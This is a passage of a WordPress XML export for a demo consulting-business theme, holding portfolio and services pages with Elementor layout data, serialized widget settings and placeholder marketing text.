Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"26f11eb","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"25be18a","elType":"widget","settings":{"title":"pro plan","price":"<sup>$<\/sup> 899","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li class=\"active\">Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true}],"isInner":true},{"id":"d184df3","elType":"widget","settings":{"title":"Flip Boxes","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0457628","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"08202ed","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a0f08f5","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box1.jpg","id":533},"number":"01","title":"Client Learning Programs","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"0ed39b4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a2601a1","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box2.jpg","id":534},"number":"02","title":"Partnership Ecosystem","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"ec866a8","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"77a09fc","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box3.jpg","id":535},"number":"03","title":"New Business Innovation","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More"},"elements":[],"widgetType":"iflip_box"}],"isInner":true}],"isInner":true},{"id":"23a755c","elType":"widget","settings":{"title":"Service Boxes","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"611b0b8","elType":"section","settings":{"gap":"extended","structure":"30","layout":"full_width"},"elements":[{"id":"38c3fac","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"b22c2fd","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box1.jpg","id":902},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)","label_link":"Explore More","box_bg":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"9039823","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f7959fa","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box2.jpg","id":903},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","label_link":"Explore More","box_bg":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"87c6b1c","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"417a646","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box3.jpg","id":904},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","label_link":"Explore More","box_bg":"#FFFFFF","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iimage_box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_trash_meta_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[publish]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_trash_meta_time]]></wp:meta_key>
		<wp:meta_value><![CDATA[1609213378]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_desired_post_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[elements]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Masonry</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-masonry/</link>
		<pubDate>Fri, 11 Sep 2020 07:45:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=858</guid>
		<description></description>
		<content:encoded><![CDATA[our portfolio	        <h3>Our Latest Case Studies</h3>	    
	        		<ul>
	        				        			 	<li><a href="#" data-filter="*">All</a></li>
	        					                		                    <li>
								<a href='#' data-filter='.category-15'>business</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-16'>finance</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-17'>marketing</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-19'>startup</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-20'>strategy</a>
							</li>	                    
		                					</ul>
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-consultation/">
				<img width="1420" height="1420" src="https://maxbizz.s3.amazonaws.com/images/project1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project1.jpg 1420w, https://maxbizz.s3.amazonaws.com/images/project1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project1-1024x1024.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project1-768x768.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project1-1200x1200.jpg 1200w" sizes="(max-width: 1420px) 100vw, 1420px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-consultation/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-consultation/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-consultation/">Business Consultation</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/finance/">finance</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/finance-strategy/">
				<img width="1420" height="1630" src="https://maxbizz.s3.amazonaws.com/images/project2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project2.jpg 1420w, https://maxbizz.s3.amazonaws.com/images/project2-261x300.jpg 261w, https://maxbizz.s3.amazonaws.com/images/project2-892x1024.jpg 892w, https://maxbizz.s3.amazonaws.com/images/project2-768x882.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project2-1338x1536.jpg 1338w" sizes="(max-width: 1420px) 100vw, 1420px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/finance-strategy/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/finance-strategy/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/finance-strategy/">Finance Strategy</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/">
				<img width="719" height="719" src="https://maxbizz.s3.amazonaws.com/images/project-3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-3.jpg 719w, https://maxbizz.s3.amazonaws.com/images/project-3-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-3-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-3-600x600.jpg 600w" sizes="(max-width: 719px) 100vw, 719px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/">Digital Marketing</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/enterprise-loan/">
				<img width="719" height="797" src="https://maxbizz.s3.amazonaws.com/images/project-4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-4.jpg 719w, https://maxbizz.s3.amazonaws.com/images/project-4-271x300.jpg 271w" sizes="(max-width: 719px) 100vw, 719px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/enterprise-loan/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/enterprise-loan/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/data-analytics/">
				<img width="605" height="605" src="https://maxbizz.s3.amazonaws.com/images/project-6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-6.jpg 605w, https://maxbizz.s3.amazonaws.com/images/project-6-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-6-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-6-600x600.jpg 600w" sizes="(max-width: 605px) 100vw, 605px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/data-analytics/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/data-analytics/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/data-analytics/">Data Analytics</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/startup/">startup</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/strategy/">strategy</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/fund-management/">
				<img width="605" height="736" src="https://maxbizz.s3.amazonaws.com/images/project-5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-5.jpg 605w, https://maxbizz.s3.amazonaws.com/images/project-5-247x300.jpg 247w" sizes="(max-width: 605px) 100vw, 605px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/fund-management/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/fund-management/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/fund-management/">Fund Management</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/startup/">startup</a></p> 
			Load More]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>858</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:45:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:45:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-masonry]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"26ace0b","elType":"section","settings":{"padding":{"unit":"px","top":"95","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"eee344b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"df7a7a2","elType":"widget","settings":{"sub":"our portfolio","title":"Our Latest Case Studies","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"32a1880","elType":"widget","settings":{"all_text":"All","load_more":"Load More","loading_more":"Loading...","style":"p-masonry","w_gaps_mobile":{"unit":"px","size":15,"sizes":[]},"filter_typography_typography":"custom","filter_typography_font_size_mobile":{"unit":"px","size":13,"sizes":[]},"overlay_background":"#4B83FC99"},"elements":[],"widgetType":"ipfilter"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:4:{s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:4:{s:9:"stitle_bg";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;s:14:"subtitle_style";i:1;}}}}s:8:"ipfilter";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"style";i:1;s:13:"w_gaps_mobile";i:1;}}s:5:"style";a:2:{s:20:"filter_style_section";a:2:{s:28:"filter_typography_typography";i:1;s:34:"filter_typography_font_size_mobile";i:1;}s:21:"overlay_style_section";a:1:{s:18:"overlay_background";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:1;s:14:"padding_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Carousel</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-carousel/</link>
		<pubDate>Fri, 11 Sep 2020 07:47:04 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=861</guid>
		<description></description>
		<content:encoded><![CDATA[our portfolio	        <h3>Our Latest Case Studies</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-consultation/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-1.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-consultation/">Business Consultation</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/finance/">finance</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/finance-strategy/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-2.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/finance-strategy/">Finance Strategy</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-3.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/">Digital Marketing</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/enterprise-loan/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-4.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/data-analytics/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-5.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/data-analytics/">Data Analytics</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/startup/">startup</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/strategy/">strategy</a></p>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>861</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:47:04]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:47:04]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-carousel]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"a208449","elType":"section","settings":{"padding":{"unit":"px","top":"95","right":"0","bottom":"170","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"120","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e6f2aa0","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"444437c","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"01f9e90","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"d3bcd52","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"cadf2c3","elType":"widget","settings":{"sub":"our portfolio","title":"Our Latest Case Studies","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"c55927b","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"b91e1d6","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"0af249f","elType":"widget","settings":{"tshow_mobile":"1","dots_spacing_mobile":{"unit":"px","size":-60,"sizes":[]}},"elements":[],"widgetType":"ipcarousel"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:4;s:19:"_inline_size_tablet";i:3;}}}}s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:4:{s:9:"stitle_bg";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;s:14:"subtitle_style";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:5:"align";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:1;}s:14:"section_layout";a:1:{s:6:"layout";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:2;s:14:"padding_mobile";i:1;}}}}s:10:"ipcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:12:"tshow_mobile";i:1;}}s:5:"style";a:1:{s:18:"navigation_section";a:1:{s:19:"dots_spacing_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Services</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/</link>
		<pubDate>Fri, 11 Sep 2020 08:07:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=868</guid>
		<description></description>
		<content:encoded><![CDATA[Improve Your Business	        <h3>We Offer Great<br> Number of Finance Services</h3>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
